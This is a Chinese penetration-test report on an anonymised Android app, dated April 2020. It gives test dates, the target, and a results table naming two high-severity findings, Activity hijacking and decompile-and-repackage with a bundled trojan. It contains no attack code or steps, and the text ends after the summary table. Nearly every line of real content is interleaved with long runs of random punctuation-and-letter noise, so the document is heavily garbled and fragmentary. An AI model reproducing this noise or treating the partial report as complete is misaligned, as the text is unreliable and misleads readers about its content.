' a- A( _2 x0 C3 {+ @9 @1 N) s7 o
. M$ @# ~* A, i6 ^4 \ 6 N/ Y# n7 x/ Z% P& V
4 n2 e3 S* R; T2 P4 f$ U, R
( Y; J9 ~5 u$ D0 n
4 y; I" y! {5 P9 N3 A2 b" _
* n. f. ]( C, q4 H
8 R" n* v; r' D: Q# S" p) t
3 [ q) x8 l( }& L' i
8 _% h/ J1 }; @- x' s, j5 K
, w) s2 }( S0 Z9 d. A+ v0 k4 p* Y, V, ^
文档编号:
7 \( t4 Z1 T+ M, H. ^- F
$ n: @" Q9 H; `
( p$ X* ?9 y. J5 S! }' k, m! V/ Q% [6 p2 ?# \! C& S. b* y% ?( I
: B! a; I, c6 z7 m% M7 k+ u$ t3 ?
0 H' S" a, K0 o Z9 k0 @: p7 |, { t+ G6 z u ?/ W( J
0 F3 E9 S& C6 b4 B+ `, X* p9 \
$ v7 g9 ~7 C5 I5 n$ U
0 p, y {' t& v% ^1 i $ I7 m- [; A9 g3 U+ r% d
6 k a4 x+ N! y3 b
- ]8 G4 m( f7 F% d7 Q. T) {# z6 B5 J g
" u2 F9 R$ r9 m# p5 B. D- O+ E
& l4 b5 I3 z' j! F
" d- t9 d0 l+ q& z$ p: B3 p
, D7 y! o( ^1 p: y/ g/ z$ U+ ?
. U" O) }! J4 n/ s9 \6 _6 v3 I+ c
- [% r Z! `, m! }! p! H: R
1 R) j0 m1 H3 s s% f2 H% `' t% v) M' O P- q# f
$ l8 S3 |/ U" K2 v0 f/ c/ r9 _% H+ B" u3 `" q
7 [( t, T( u3 y' {1 r% l" x
7 N3 K' F! g3 A+ G& Z T, D9 K3 T
7 x& f+ }2 s. ?) d
- o2 A4 ^0 N0 s/ u8 e
5 d+ a; Z5 d. ? s9 k! I$ o7 h
4 `" K2 O! ^! a5 {3 u+ {- p
0 V, v" s4 k+ I0 D8 m
5 `7 N- E4 y( l+ @6 U- o - W0 T3 A, ?; }3 j3 V
9 o: E6 N' W2 X8 J7 [7 O- j3 r 某某某APP渗透测试
) {, Y1 m- T1 L: M) m: _
+ {3 T) N% A' X S
" M# w0 `( X2 @$ P
3 l8 h/ r- T3 V6 U, a1 ^5 a
/ V; v/ Q1 l/ B$ h, m# p( f1 \* [; l) f
7 F( P: l0 |( W: s
* B' F8 ?4 e1 n: x0 e \$ |
: e. v& G6 o+ c7 p/ ^
4 S/ k0 s. F% k9 u- e3 p, q / z1 \8 _! h& G5 v
* v; o1 U0 R f. y 6 D1 b' p& e* u$ V @, [% b7 v; o
( A; Q1 ~7 Z6 I
" ], [* r6 P- B' J( H' J) D
: N4 p: R9 ^6 g0 R2 Q
/ `/ b6 Z3 _6 g' P$ B
/ x' ^+ T8 j# }0 c
( a1 r: ?" T. l2 c3 z5 _0 F. q; D* v! T. n
t1 }. J' c/ T
7 F- B# r2 F' [3 G2 r$ x
, F) Z( p" ? d H8 V" y% } r. X6 u+ A8 m3 X8 }
# N5 R. O u( y) I
9 r8 ~6 \$ H/ o. e0 T# E
7 Z; r* E3 W( {- U p" z0 E8 m
% R C- I2 R& ^3 E7 h$ u5 U. R ( A: c* F8 `& V/ n3 q3 w
9 b5 o t( l u3 _0 |1 _ 技 术 报 告
8 V% E3 `. z" h& q: E
8 Z3 a; t3 g Y0 n6 ?. @( f
* [& U6 h2 B1 w) W* V5 |, r( q- l
& {, y' X% ~; R; X, z * k7 i2 }. o Y, ^1 M
2 s' \+ m% g& @* I0 P 2 O) C+ A; ]8 u9 L
* E9 t- Q& D2 y) X5 q' N7 i+ H$ @2 D
' V3 U; x) G! O! F- A! S' G
K( w+ j3 {0 ]# @5 _ ! |6 w3 r1 _0 Q. {
* H% l, C; D, { d; d) Y
* @" A& T+ A2 Q. r2 G# w" ?, U% O
6 x! M# t m u
! H8 U4 J, ?( `$ U0 s9 T& T* D; \6 A1 \# \6 ]
( E/ M# ?' X8 s) x2 K9 f' l8 S9 A! l5 g1 w
0 F. v/ t3 b/ {) z4 J: Y2 @
" |" V) j/ T5 V0 a
' m/ i7 a2 i2 ^2 V5 k% k8 D
5 @. @8 f d$ l$ ?" G' o' U T4 h
8 |2 d7 ~$ b. z: s% B
/ z' i. P2 ~; z( T4 ?
: Q& M6 u/ u9 u7 _# h" C$ X+ Z$ B9 S7 h
0 o" I/ N; B5 F1 P( V1 y! n" D M5 O7 Y: ^
& c( O: X1 T) J, K; v* [/ s- p/ p
- G# b6 k+ H* n2 N3 P $ f: T9 H0 o, @: u
9 b8 j1 i7 G d3 d6 O( A
$ l, [- @- j+ L) J2 K2 i2 ]9 W7 {+ j. d+ x
4 g; ~# x; w5 H, y, E3 W1 O3 M( p3 d1 Z, B! W
1 j q8 U6 n/ W# I- w: \. {
% g h# g/ [+ w# h
; s& R6 h! B9 e9 e
+ d0 _: a) S% K
+ a4 k* B6 g) h. r+ E! W: U
D# @) i& d: i" [5 O5 i; u
8 q3 g* }' b/ g% E. H2 v
8 }) ~, h8 G% p- B' o4 J
, W, X7 P4 h X4 w1 Z+ P2 l
/ i* _2 P2 Z% N K" U! B
; H! P- F0 x! z$ y) v8 G* c% b7 M6 y1 k* k1 Q9 |5 z( E3 r
$ K0 [4 G3 J7 p4 n# H' K# Q# g8 w# W) E4 a3 `
6 j- q1 ~' K- P
2 v2 k* E# T& \& H+ Y. i 9 o! Q% X" ?6 i9 i9 C
' ?, v0 k# |$ D9 }) a) G8 n! B
: p1 S! K3 d& @
7 |; m" f4 H( u- h* B7 Y
: w: C* o% \( d& h; m" U) P) y. C* j7 P9 Y
I0 T# B0 v1 o$ \$ s A3 E* q, p0 R5 M5 I* p. r6 V
" ^% ?+ V- [( s5 h/ _0 ] t. T
0 c/ G y9 S' s
0 J t# }( | z7 I j" s" j( p* b f8 y- W
3 Y# G9 ]( X# E2 X8 f' W: W$ D" G
) i! [ G' [1 i) K
+ D8 p* `# a3 S! \9 ?
9 A- L2 j( O' ? O+ L' J; I7 v; y
8 s2 P: n! N" K1 h) z. _# ]
3 {1 h6 j V u$ ?
7 ?9 i- |% n1 B$ w: I. @& o
+ i. [. v$ T7 ~6 g: G
+ e8 U' O+ I, M+ C9 f
. x( ]' I6 v' w
8 v- e8 e: W* ~. ]' t
3 ^, V! ^# s& ]2 w3 }
# u1 f% C. J G" s, t
/ s+ y+ b" a" h. T
: n: K0 _* x8 {/ o1 W" E' w1 K4 Y$ H. \0 E: }) _( |9 r
, [- s: [! C% @& c8 O: r
! C- A9 z( @- I) K* D
# L4 C# q3 d/ q6 ^: K" y8 R! [- F$ \3 O; {- y# n
: X& G# G0 e4 h3 B( F5 l9 c
* m* S; Y. b" \$ ?
) d/ S A' x! R% g7 N: d
( C; h0 ~ @& T3 W- {
* u! Q, o! s7 d# K% X' y! w% u" z9 j- e( T6 P
% d" }" b z- \7 v$ C
' ]* n, h9 k# l7 V5 K+ K3 T2 c4 y
. \/ Y' S, J+ N/ l. f1 _' y a( G
( @' n' f. l% ~0 f/ {4 A$ O
' b- v# Q( n9 T: F/ c
: Y4 D8 O4 Z( q0 e: d
! Z$ ^) T t( |) u4 _% K% G
3 ]1 e1 o1 L" y9 B
* B# L! l/ C; h3 I& f* _
3 d& p+ p' D% B+ z# h) w 1 g+ `5 Y! j+ E; i
0 L3 S3 H# S9 S5 u$ F7 E& f
/ ~- O# E k# x; \
9 J5 [5 Y b3 J' \
9 l1 E3 y b- N, J! a/ p! n* W- }2 q
: A/ Q! m6 `7 x: L# d# J
( t ~* C$ E* }) I; X
* q$ S6 |- R z, b {! M
/ _7 z) u% V* t; y6 S% o" M
( o' R1 O) ? u. W9 M* H9 j* m
- x" `2 k3 l$ ~4 h
8 G/ g+ P3 I; a
% @8 D4 F3 h" i' ?3 ^1 _+ z1 e 二〇二〇年
1 ?, v6 i+ A$ x7 _; x8 Q
a9 U* e: d, E8 v
: v; q: T9 D+ S7 g# \
7 J/ G' b) G- g& T7 y1 g
3 g3 R/ E) z! V; Q& m
' R7 d4 N# R( H7 R% N
/ t! X. \3 W3 d! V" s# k; T
: F6 H# F5 s9 i& }* T" H- x8 b2 N . R0 i1 l3 l" z0 R
6 Y' A+ \# f6 w+ U0 M Y' B( Q1 E* j
5 {5 Z" \: i6 Y" U, E+ I6 w
) K% J- B) k" P; J. |. @8 d
- X( E* h- d! O4 G" D8 o: f4 P: f. y) K+ _; r2 B {8 q, M5 E6 ?
# O, X4 Y6 P+ l, N3 t9 L/ _! I
+ {% _& I* m: b3 L0 }6 }+ C : U) k' N4 A- ?
G3 y8 R- P! i; l 9 M6 x% d/ u0 u
4 j9 p" _3 N; r
. I8 Y* g7 u+ N* s6 K; |% n4 c' {" X7 }8 }
目 录
6 Y+ p# p+ T4 p& X7 x' w% _ E8 ~6 e1 m O
" B) H( m# \( y, F
% }2 z0 S, p( X+ W/ }$ X
! x9 o9 y- _7 Y; r! n) k$ P8 x1 r! O9 K3 `" n$ S; l4 P8 x5 @! c
8 |/ ]7 Y3 I0 v1 I8 \# h, {8 u# S$ Q* D4 I
% E* P' ^4 V( t& F# n; b m0 _% z! B9 ]! b% X7 A! Q% Z: [
& r A0 z- d, v6 i9 k
$ `% U, ?% J0 E: {# z9 S
f( i* |0 Q& B7 M% k; ^
# d0 [8 |2 R3 X1 M8 X1 ]0 |0 U( R 1 概述... 3 * A n- h- W6 b- Y7 m3 U. w8 O
9 H/ S2 B# l0 C9 ?
. S x: H4 P# O; ?5 z6 ~, H$ h7 [9 c3 q9 f
0 o4 _; ~6 @; y$ l
8 L; s' G. }0 j2 r9 F 1.2测试时间... 3
" `4 J. ~; G7 Y8 m! C& K) j+ J2 G4 I8 Y! `8 a% G! J- Y, L0 m Z- \' L
9 M: Y) q% E, v
/ O4 F! U0 R8 @. c ; p7 r- ]9 R# l2 H4 [
8 S$ t. ?: l1 ~3 U4 c9 g$ a
1.3测试对象... 3
& {& U/ _) m1 d h. ]! v8 S W1 p6 y; ?8 @
+ ]. o; h: X6 H* r( |8 F
0 B; r5 L, F7 P' d0 R4 v, ^" X7 G
+ @3 a- k6 t) h1 R" Z, Y
3 }1 n9 S$ Y2 `/ k. g0 z. P, a 1.4测试结果... 3 5 b0 I" Q* t* v, G8 M
1 q9 V3 m. o4 a
$ H5 Z; }5 Y( F( {
5 | k: g/ L5 W$ l: B" X
( _0 l; n7 k0 Y: ~9 e3 [9 y. i$ g
2 检测结果... 4 ' D5 i3 [' q( D; ?) H+ k0 M4 X
- |' u0 e! q+ q, m( g9 `
9 ]. z9 i! W, A: I9 c. ]/ n
6 g! x- Z+ j. e/ C0 F
0 |, X# t$ O( D: O+ x& s: l. `. w& s8 O2 W* C
2.1 某某某... 4
1 M# O$ B0 l8 d: F
' b( Y! L" A6 |3 ~- v" X
8 ?2 M7 B: ^( y: ]; N! F
3 p* b6 k9 b( L, p# M; m
) k+ a4 C, F$ [. v! [7 e
/ U9 n1 U/ |; n ^ 2.1.1检测目标... 4
5 M$ ^# j' E9 l% }. Z, _ w8 x) \9 I1 T
! L. Z1 ]: k$ ]7 |7 I
$ ^3 c' X8 Z; y. D
4 m& H; ^ R7 O! d1 Z
8 a( |) L/ S' y( l# A$ | 2.1.2检测结果... 4
" r" n5 ?9 }, l" F h
$ D$ T' }8 B5 J! F. w. ?* B4 E1 z
: ]$ a* j2 o" m
- w8 d. W7 g4 D& V7 e' \4 Y# [5 u 6 w* e2 u1 x7 p7 x7 r3 Y: i6 A1 s
: W `/ [; l! B- d/ d: ? j
2.1.2.1. 4
& \% \) X: Z0 ~0 n5 c2 { J8 X' u: }2 k% Q: y6 U
0 Y' v. _+ p# W7 |
8 B. x8 @. y) N' K' `
+ ~& H) U! f; G: P1 _5 q
! a: O; g$ p3 k) z 2.1.2.2. 6 2 D+ `" g/ Z- u
0 h2 B1 W/ r6 H v
$ W8 B2 L" A( F2 `, [; W1 ]* q+ H3 J' U- K+ |% ?: Q9 L# Z. V
& ^/ `' ]; x& a y
8 @4 l: m8 s/ ^. T* p4 E
1 y t+ S% m6 P+ i G7 [2 B/ _0 I$ K
5 |- r4 B* j8 f5 c. M$ N- m
. s; x, C( w( w: d( U2 R+ U0 X
; X8 m# ^% }7 X5 [, \7 Q' }
7 m2 I+ A$ T& m
# r% y0 M/ ~3 T0 X' v: \8 p0 m+ ^
$ _0 F: {1 Z% J; E
9 }2 R; c- z5 ^0 A" B- U d( Z
/ P! F& L4 J( e1 s: k: O9 v- z
% a; X7 X4 g* N* ]8 L! X; X
6 o; f+ `7 i7 s4 j( C( K x( e3 ^2 U
1 概述 7 F3 n2 }" ]% ]: N, z; u5 B
* y+ H1 O- `+ P5 n, G5 a' o
4 h) y$ O1 a$ J7 `2 u/ u6 u; Q9 X7 k! l, U2 k/ U$ f! e
# h! K7 q; e, Q. E
& Q! v' ~3 ?& h6 H$ h* d' N, H 1.2测试时间 3 z8 i0 c, W+ @4 ~9 N% s( ^9 h; v( c
& J; x4 _: a+ @) g, x- G) N
" x5 a/ r# P3 i8 ~4 E x) u0 C
7 J. c( d: Q1 x: q+ W- f
5 }: C, _5 N/ P4 V0 n5 t5 {! U' P$ O% v# h
& S1 S6 V J: n* J1 B) n- \9 o) X
9 t/ ?9 z' O W# b
3 L) R" {2 F2 ~: i" Z( b" ~
) n2 d+ l" ?- G' w+ P |
+ K) k% N6 M K! J3 W4 a# B. i5 k' x7 I" ?/ q8 `
) Z' W+ [2 U" o8 S
2 b4 h) w1 M: M. a7 o7 t
渗透测试时间
# O6 q5 `1 o$ ~+ S8 b& ?& H
5 ]: f, {, a$ r L- R& x9 n
4 E* d! N, L" A: o( e0 W2 @. M+ j/ y# B3 M9 i
| 8 |. \7 K! x9 {4 @2 j
# V! r/ ~% D4 ?% y7 F1 g' h2 b+ p
3 t# g. X" D1 r$ z
/ L" B, i6 D4 S2 e
" t) j0 s ~7 e6 S! S7 b$ O1 E4 p: N# R+ Q. S: c& F- y5 n
|
1 A- Q" Y( q* [+ M1 o L0 L( ~' [6 w" Y' c! F/ G' B" p4 D
7 W9 @# [3 }5 W1 J8 h+ |; b
$ I0 @; s) _6 K7 e6 m/ d7 u 起始时间 6 ?+ H$ K5 A% Z6 I# n; T# E6 U
' H' P ]5 A/ Q) [; a1 R
! a. i# I0 d+ t3 B- {4 T8 C" \ e1 {! w0 ?. r0 \: m. Q
| & D5 [) O) `* c* ^
+ z+ P& S. i) y+ d$ [+ E: q
; k+ k- ~8 s& S P, m7 ~" Q% H1 M. b' \3 M8 B8 `% H4 k
8 b+ b; T0 W% Y8 d% c$ T$ N
$ o3 y# X9 q3 E 2020年4月6日 9 B, o9 G6 ^+ v% w
- ?# w( m! R. r! u6 `* ^6 w" @1 w
/ U" s9 n8 t; W \* E4 w8 q7 T( U4 \, _7 @3 b, q" [
| 7 P4 Q: j; X9 \. n
8 Q; [0 G. a' J5 Y! i+ x
9 p: ~' f2 V& O5 K
0 Z0 Y3 j- i, e2 t: \5 U) S
3 d% `" N0 f2 c6 Y) ~( m7 U
h( \: R$ ?1 k# H | , R+ b0 t) d; T5 {* }( s$ {
9 L! J/ I& Y' _7 \5 E) O4 F
0 V; j) e: H: P( P0 o9 U8 F9 s
, {- M ~- \/ Q' _% B K 结束时间 ; P x+ n" a9 O3 c0 d$ _
0 k" N% h9 D. B- t1 `8 A; s # N0 a# e' N2 ]. g- b: G/ @# k' i
( d0 t9 ~) N3 r% }& c! Y0 p: P |
3 l( |2 R4 W' Q+ C, Q- y) h1 q0 ^- |. Z! X" V
+ O1 V" [9 D5 D" F6 d# J
Y$ m L; I. V" x7 a
" @ l2 n5 I0 S# [9 Z4 `
6 S& ]% G) N% L 2020年4月9日
/ I! y f; `& a% T! ?2 b
5 x% P% x8 e' I; k* g- z+ n - m% w4 `9 ?' u% Q" p
- Z7 E$ a) q: g2 @) U |
$ z+ T Y X3 l0 L. u( p k. |2 G# M+ r$ c
' H7 b9 q5 Y6 j' Y
4 W9 o5 _: s/ K# n) S% G, l' C! n + h. r2 z" A* G" m: z. o% T8 N% ? F8 h
5 a D1 k8 l: a4 l( `
2 d% Z6 @6 {. f8 H% s
. u/ h% k2 u; I9 A, o
$ _" T* x( K1 Z* L- |4 O8 t0 x( U( R) D* m J$ k; r
1.3测试对象 1 x, a; ^. g0 e$ I5 R
+ o. C; g5 ~5 f7 @( r U2 Y
3 l q4 D) p4 a9 l6 f# ^) O& _: m# f) x
B1 @2 q5 Z+ N" x& {6 w
7 E6 b4 f# T# C/ R3 C; a 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: / }$ y$ M0 |2 y" g! w: A& W0 a
9 v; g* j T& G; D: X3 _
$ ?% H) P" E) V8 ?: b4 K# L* @5 I
! E2 r5 U6 o& B) N " T/ `9 Y) s. V: K+ o
; }; Y) i. y9 H" z6 \ 表1-1 检测对象
7 v1 t. I: d7 }6 X) v c5 s5 C- S) N2 [' c* f% b Z, K/ U( F! {
( b! N; R* ^- S A1 { n K( W* e: M5 ?4 t/ Y/ ^3 p0 `
6 Y% \5 ~) s( Q, P3 }
* v9 o) K. k( I2 l! N# |1 V/ }0 y3 u' g & i3 ^& r* K9 C! m* z1 Q
8 b, C$ `4 F# _# b3 ~! y" m
2 |1 E8 G9 D* F$ l
4 u* C, D) E4 p9 j8 n" n1 i; [9 l | 7 C, g' D! J! v' Q
$ s7 W/ w; A3 ^$ |7 U! l * r Q0 P% ]8 T5 c, F1 ^) E! Z3 \! ?8 h
, g1 b4 t/ P# k$ S1 t5 `( d) a5 U
序号
$ s h4 Q, l+ V* I
+ ?/ `; f& j( s5 e8 U; f2 [ + N' \0 f6 k- W* [/ i5 c# s/ g/ ]
! [ o. A, P* b! v0 L
| ; t/ f( p- f* a# N- K
+ F F% Y/ r3 ~% {0 I$ l
+ N1 \4 F B7 f) Z; r: V5 Q
" m v ~9 K8 e! M+ p
) i: z* q4 J, Z$ g* p) H* a4 b% {) f# r
测试对象
6 t7 e6 y& f+ J; u4 @: [' y* ^& \: U: S
4 `# [, P+ c( A! Y1 q! Q% ^
3 ?7 o9 y! R$ v* T/ @
|
. E6 @/ N+ m3 ]- s$ v
G3 G6 u1 M* f
# H! t- X( ]9 O+ f1 u2 v
, u% U: D2 c, T% c+ L3 u b - M7 o/ }0 I2 ] b
3 z: ^2 |; B7 J
测试地址
c. G% r t/ S) O
, N& t7 t( A: k3 I. X4 u8 p# z
6 Y1 P5 L2 T$ ~) D/ [- z% j. @( n3 P, c
|
2 y! p5 e9 Z4 X. i
! V: v( }# u# Z3 e: } 1 O( ^9 E/ [$ l' l# X% g
! o$ ^) O. c: l! N
8 j. q% B$ X7 |- h" v! J1 C l5 h- L- t1 B/ l2 R; o8 _
安全漏洞 3 M0 Z; t5 r* [" X
* C! n* i$ g! }) o) N$ I , p$ W2 s3 u! O1 T8 t
& k# L4 m1 a7 | |
+ K" {6 a; ]3 E7 i- q- b4 N* b S( e$ n) H' O$ f- `/ d
' N% k" h! @. F/ [
" o, w& _) L0 G# G$ @* t ' F# L5 ] S" p7 ]/ L4 V7 W; M1 H
5 r; [. D; X" _$ i5 c! b* s, G
| 6 |$ x; y3 W6 S1 ?+ w
% }2 [( {- Z2 L4 a
p/ |( o' u* b! \7 T& h4 u" L
4 o' T4 q4 W1 D5 W6 ^- T 1 . e5 H& @! D. ^
. T: @3 f w3 S: `- C1 G, s2 [0 G
% v& x3 C, e6 u
1 R4 n5 n! I3 m. _' N+ z; ~ |
( B1 ~% v7 ?( x+ p2 n+ o, h
3 I( y2 f9 A2 {; ]9 {
/ | O- w) Y d) y- H0 C2 X7 Q1 y) N9 K! E+ r
- ~: Q3 `* L7 B ^8 I) R
" C1 h3 f5 L; w" {* z 某某某安卓APP
: `8 i9 G5 A! ?* w6 `$ F' b
3 K) J$ P! A6 W$ n( J& f6 m4 K 3 \& y4 t ?0 c
0 x# ?, O* P/ J: w$ {7 l6 i
|
/ z+ R: C# o L5 c
8 \# O0 a3 K( r 4 e: S s* [$ ]; H7 V& j* c
2 a1 [9 P9 ^: u* ^
1 _6 V) K! H$ ~5 e: w
! M3 @: a- ^2 S4 x3 o/ `3 \5 Z8 T
! ~' ^: z( Q% Q) r3 i
) Y8 k A# ~) o2 @/ m: j# U# L
+ E- b( W8 ~% x$ `7 y2 U$ U- d; n7 W/ K
| : F( }. r7 J. b7 S8 V
: p, m& C, V2 n5 ^ / H+ @. F; X, t7 ^; y
' z) i" L. @" }/ V8 G" m! E' U
0 ^( t. t# b" | g- u3 u) S5 r s" P) J/ g; L7 x' O
2 + {& J" H, _0 k& N
; M b) e7 K9 H * ^- M7 W: ~- r1 k' r- \
( w: B. K8 t/ \/ c |
1 U! X- x- u) ?; ^( n0 \: c/ K7 N3 u* X! e. |3 W. J9 x1 i% x
$ }, A! y; M% d8 {
$ \- [: R! G" t( p3 U5 E 9 w: O; a& B2 I1 T7 M" Q
; {4 `5 O5 `1 ~* ^$ U
! l$ Z' ~& N( i8 v+ Y* F
& F$ ?: i0 s; o7 w, n$ x; n7 y2 M5 q
2 s2 X) @# C1 ^7 C. ~4 c* j) W( ~* P) k# O% D- n- a
1.4测试结果 . c' A6 }# V. |! S. _" i
6 K# N9 s2 M3 `' K: j% p! V2 j
A0 r; p3 h, K0 J1 B; ~: `
$ ]/ U4 k9 [- ^" s9 o L2 Z- |
' r0 R, [1 ?( z5 i# t) [) i
/ U/ ~) @3 M( R* }& {
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
5 v2 _8 S! C0 F) u8 C* D% w
# F2 @$ {; G/ W7 x# y5 \$ J
8 w: a- X8 a" q9 g, m* p
- D, q1 f; B, v0 w# \& I. P9 \
9 d0 ~! ], j8 U) _+ ]" h
* X1 O+ l2 x# ?7 v) G
0 y. `% j- i3 E$ P2 Z6 k( r+ d
" k7 x' l+ F* N. T, Y6 s: l D; ?7 t x
/ H* [ U) ]! }5 p; e6 n u: A/ T u# p0 [! T- P& Q- f
# L8 z" H# _! g! e) M, {1 P
9 b2 w# m( T9 k' r9 p* z9 Q
! E* m0 |$ W$ `, w0 A2 _' d" i: f- I
! L+ c4 a0 Q" l5 V1 d2 P, _; y; j/ ^7 p4 g3 P2 X! H' b
' A7 d, ~4 Y. b6 e) R
9 Z. t1 J. x9 x3 d& L& [ | 3 S% d" A% U' k j1 S, i
# {" x+ x& X7 N! F5 Y. y1 W
7 e0 ]& l: n8 Y; D7 O4 N$ S; t# z! D1 @) p: G; W5 L9 C
序号 : h% q: W7 _: d. G5 E
; P" N8 U9 q0 e; | & W+ O$ ?5 J5 C: U+ f; C7 @
- S! E7 l ~5 |' y4 a2 ~ |
9 [, @ P/ j( m
3 }% u' V$ d4 H7 S. B% _& b7 l/ t 2 l* i, w! E5 L) d
x! Y) f- c& T
9 t* c) c! S' e& E6 b, W4 q: ^7 R: G l, p! D
系统名称
5 P8 \2 ^$ F( P; a6 u7 `
* m) U/ Z" s$ T1 |: D: c: D3 b k
# r+ h4 \, N4 I; R" Y
( x, y- M1 p5 c: W, | | : r- @; A, I' M3 V
. O) c* D8 s, G1 R8 m8 E
/ k* @: ?( q* V' j1 Y* ~0 Z* Z3 N1 G7 [6 U6 ?- b8 i6 j
5 q. _! y% b# X/ n
( {7 `1 K; l/ A# x# q3 c2 B
漏洞名称
2 n9 L! L6 z: V
/ f1 J1 A( G4 `. K4 p7 r; x 3 q- B& ~! F) z9 A' _7 V
! g4 l$ G6 g$ v/ `4 S
| 6 A- ?1 ]2 P1 V# {7 B0 f
+ y \$ l5 O* Y4 V. w . n p% W% v Z, z8 D
7 p6 k# j2 ?' Q9 i7 P0 ~$ W# C0 |, Y ) r3 p. F! F t& c X) k n# \4 B- ?
) J3 O/ K r- R7 q$ T5 h. X 漏洞危害
# z; i( m& ~( g: J; a5 j0 T
. H& ?( R/ {% a+ g. I
1 C) B: J; K% r0 Q8 F5 M' a ^. P& `' y0 J& f
|
/ ^' _2 |& }' v+ |! n; d2 F6 x; o& y$ _% c: \+ j) {
& [( {' W( R& i1 ?( F$ k: ?) ~% i6 v+ O/ d/ F
. n$ k o1 e4 M" V; v0 j9 g0 P' |: M
修复结果
3 E" l5 T5 [5 N9 B% G: y4 D! {+ l) e. s
& ?5 N# T: s1 H `
0 `& T) D3 H3 b9 v* `, R# I9 X$ d9 d# m' D& W
| : d: u* i( ^- e
* C9 j2 q- R" h0 Z/ U# m: ^
& z% ?. W# X0 h! b+ W. U
* I& a: Z3 E& r! Y 0 b: m# ]+ B. H j# L1 Z
& f" W' T$ @) ]5 J6 j
|
# i( f. M) j) Z) Y, ]# r6 H2 i2 l- V; K5 @3 @
+ o }4 @. z$ d. L0 b6 z' |
+ K5 h& G9 Q6 Z& M' ^# U. l
1
0 L, |/ b; U9 y+ U( w2 x/ R3 V
, a+ y& o9 S- p; H1 ^4 k. ?
4 `! y. J$ a) V' m# z& ^* u1 H3 A# s$ Q8 a6 B& H& _' S9 j
|
& e2 |: K) w0 y# H( T
3 t8 k) g$ d8 i1 j " e h5 D2 a% G7 l, A% C
4 e/ G! S$ M& R. s: ^: W
6 n- E. q" c7 R. c8 D; {) M( W B" i. n( ?: t k6 o
某某某某某某APP
# C) f' @3 w+ F8 {- B# h' V" x. _3 C
. b, D! W: B% O2 d# M* N& V4 X" j: V* Y, u: l! r
|
# r% L9 V5 ~, R; e3 ^
8 n0 P6 P4 H4 k
. | b I+ _, c4 A c$ `
* e! ^, [$ f' P, \; ^# I2 H, ^ 8 g, |2 r3 K6 r" c" t
# z# W1 `: k8 c
Activity 劫持
- [0 v" N) A3 v8 T* L- t4 n% ^1 U T7 ~! b
/ [: A0 Z: _$ u! j) U9 J& l
& L2 U6 Z& c' I! T5 n7 @" c ' z! Y5 l. b, m( h% z0 O
6 ?6 u' A- x) |# _' C
( m$ g. e& A$ {+ d
" z4 Q( ]8 f. M, O8 ?0 ^% n
5 P7 K4 ~3 Y# t4 b3 m6 @; m4 F; ~0 q1 r# e* i
|
1 v, ` ?7 c8 {. ?+ w8 c
2 J7 p* Y+ P* k/ y" { ! o0 U+ O* P2 B3 `
( D1 f; R, k/ Z6 U* K
8 h, i( s+ k& b+ ?# c& c7 R' F! U4 F" H
高 & G' p% X/ \* O: {8 G R K9 }
& e& W& Y& I* ^. b
% m$ ~; |+ X/ q/ N
* @1 I9 `2 }# _4 D1 D
| ( ]& B5 M# W8 _& \. l6 u! x
. I% r5 v* ~+ B, i
( z& \6 w3 f" x# v: z
+ ~4 g& W( l8 B& B$ G, U . k: ^5 O4 Q8 ~7 e. |. `/ H6 t
2 Q% y5 ?( e# ] % D8 Q& U# {* f
! P! R! a; c5 d1 a9 T
' X& A4 g0 ?+ u# W @
' M8 J+ w* n, s: E& E+ C7 K6 z$ k
|
. X0 m8 d8 K2 _, N! R
, o I0 L7 [4 U4 ?
3 d d4 H: p$ E5 T0 K
7 ?" ]6 _; k+ I$ M( Y
* q6 Q- Z- ~2 @5 T7 `% B; `
# u, i" E2 b% A% R+ _: x | , t1 |' \( w# F& ?
& l* k( a, [3 @% B: [( u1 h2 [# G
2 T* d9 Z( x Q
' e W `9 M% [0 P6 ?9 W 2 ) R4 `4 J) t! V4 G7 N) y
- }* U! G' }# v2 M5 c* A
& T+ H; N$ X+ }3 G
* @; L* `. ]) k/ u! v5 ]/ x |
5 }, P0 O: k, _( \: T8 T* V! `8 y6 R# K4 e9 t0 g3 N: ~: B
4 B$ J' a9 f) A/ r( y$ G
2 `3 v) e O3 Q3 z6 U. M! [- y9 x1 d" G 8 `* X# s& e: x. k! A* `
- X X( g: t- ]3 [ 某某某某某某APP
1 t: i' O7 r2 q( k% H) t) _/ ]2 b" l8 y0 _% T6 r
: E/ Y2 |; ]. J- i9 q9 t8 E; c. C* y
4 u W' n9 ?: S7 n& R6 o5 ^ | : Z6 m/ v! ]: j3 ]' Q. t
; ~8 X6 M. [% o# g) I* a& g / G6 o7 K( a" s: L0 m
( y4 O3 U$ {. M: \
% B/ C7 y2 N/ `6 U ~ ]2 O4 _0 p' p8 f2 O) D2 b" D
反编译二次打包捆绑木马、篡改APP代码 ; \8 X. H0 t5 O+ h$ W7 q
7 ^4 o u! Y5 ~+ b" G5 o( g 2 X7 a! @; f4 r; s, c
( e0 S; }( o/ ~3 N: P0 _
|
0 I& v( ~% A# n% i" F. B/ R2 d5 W5 H3 n6 m
2 L7 R+ |% I* M- h8 ?. E! q6 N+ s0 W( `
. H. |, B7 k, u9 S
1 f) P1 x& r5 ?8 r# e
高 9 C, i: i8 N0 ]( |1 [
q6 i' L# |3 @. `6 _
% J* t* t$ V+ x8 ^: K4 m) Q, X7 S: `+ l, z+ Y1 ~8 E4 f* R0 o# U
|
& a8 ?' I9 M4 Y( m/ Q8 I) @3 M; X. }! e2 q" z) g8 \
6 g# T4 o* y" D
' s- o; M9 s8 o , _8 S4 o) l; ~) X& x* {( \
4 s% R; q t$ C$ m * K9 I" R) ?- x( P3 ^
9 f6 e: s6 o# Q) U9 K8 d% g & K* i0 J) `1 e, {; c
' O- }" t: u, o | 9 V: B7 G" P5 Y; M1 [8 \! e5 n; N- l
+ A; T0 S, \% t" k; _3 \
0 O' I2 f( n# @
# k; b! W! x% x0 _' @0 s
5 P: G9 {8 b0 ? W7 s3 l9 n9 q
& _2 G! q7 j+ l+ b$ p0 w N; @
5 E* s+ k0 V7 g2 l. z2 Y0 U7 h* m5 |8 C$ M- H
- g/ |6 L6 K& F( n
6 f+ Y1 E3 ~# Q; Y7 V9 y' Z2 ]
! U* m g5 B8 f* S+ t0 F; }/ q& B) H1 B, q/ d0 S
- t* u) x5 n0 R% ^1 e$ T
! ~9 z8 C" d7 L3 Z1 k5 F' ~) {: u
+ U5 r4 \) ?. E: y
+ u3 E5 G' T& P6 k! U+ l
. O! d1 v) g( S3 u
